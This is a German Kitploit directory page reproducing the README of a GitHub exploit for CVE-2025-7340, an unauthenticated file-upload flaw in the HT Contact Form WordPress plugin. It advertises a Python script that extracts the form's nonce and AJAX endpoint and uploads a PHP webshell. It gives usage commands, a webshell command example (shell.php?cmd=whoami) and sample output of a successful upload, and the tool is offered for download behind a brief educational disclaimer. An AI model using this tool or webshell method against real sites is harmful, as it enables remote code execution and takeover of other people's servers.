Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-7340 — HT Contact Form Widget für Elementor Page Builder und Gutenberg Blocks und Form Builder. <= 2.2.1 - Nicht authentifizierter willkürlicher Dateiupload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-7340
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstests
GitHubnxploited/cve-2025-7340

CVE-2025-7340

HT Contact Form Widget für Elementor Page Builder und Gutenberg Blocks und Form Builder. <= 2.2.1 - Nicht authentifizierter willkürlicher Dateiupload

Repository anzeigen
7vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 HT Contact Form Widget <= 2.2.1 - Nicht authentifizierter willkürlicher Datei-Upload (CVE-2025-7340)

CVE: CVE-2025-7340
CVSS: 9.8 (Kritisch)

📝 Beschreibung

Das HT Contact Form Widget For Elementor Page Builder & Gutenberg Blocks & Form Builder.-Plugin für WordPress ist anfällig für willkürliche Datei-Uploads aufgrund fehlender Dateityp-Validierung in der temp_file_upload-Funktion in allen Versionen bis einschließlich 2.2.1.

Dies ermöglicht nicht authentifizierten Angreifern, willkürliche Dateien auf den Server hochzuladen, was potenziell zu Remote Code Execution (RCE) führen kann.


⚡ Exploit-Skript

Dieses Repository enthält ein Python-Exploit-Skript, das die Erkennung des anfälligen Formulars automatisiert und eine Webshell auf die betroffene Seite hochlädt.

Das Skript erkennt intelligent die erforderlichen Parameter (nonce, form_id, ajax endpoint) und lädt eine PHP-Shell in den angreifbaren Pfad hoch.

✅ Beispiel für eine anfällige Formular-URL:

root@kitploit:~
http://target.com/contact/

✅ Das anfällige Formular muss sich auf der Seite befinden, die Sie mit der Option -u übergeben.


📦 Anforderungen

Vor dem Ausführen des Skripts installieren Sie die erforderlichen Python-Module:

root@kitploit:~
pip install -r requirements.txt

Inhalt von requirements.txt:

root@kitploit:~
requests
colorama

🧰 Verwendung

root@kitploit:~
usage: CVE-2025-7340.py [-h] 

Exploit for CVE-2025-7340 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com

Optionen:

OptionBeschreibung
-h, --helpZeigt diese Hilfemeldung an und beendet das Programm
-u, --url URLZiel-URL, z.B. http(s)://target.com/contact

🐚 Webshell-Verwendung

Sobald der Exploit erfolgreich abgeschlossen ist, können Sie auf Ihre hochgeladene Shell unter dem angegebenen Pfad zugreifen.

Fügen Sie ?cmd=<your_command> hinzu, um Systembefehle auszuführen.

✅ Beispiel:

root@kitploit:~
http://target.com/wp-content/uploads/ht_form/temp/shell.php?cmd=whoami

🖥️ Beispielausgabe

root@kitploit:~
Starting exploit against target...
Fetching target page...
Extracting parameters...
Extracted Nonce: 346c441903
AJAX Endpoint: http://nxploit.ddev.site/wp-admin/admin-ajax.php
Form ID: 86
Generating webshell...
Uploading shell, please wait...

[+] Exploit Successfully!

Go to: wp-content/uploads/ht_form/temp/687590d90ac1c-shell.php

Exploit by: Khaled Alenazi (Nxploited) - GitHub: https://github.com/Nxploited

🛑 Haftungsausschluss

Dieses Tool wird ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt.
Der Autor ist nicht verantwortlich für Schäden oder Missbrauch dieses Codes.
Holen Sie stets eine ausdrückliche Genehmigung ein, bevor Sie Tests an einem System durchführen.


👨‍💻 Von

Khaled Alenazi (Nxploited)
GitHub: Nxploited

Tool herunterladen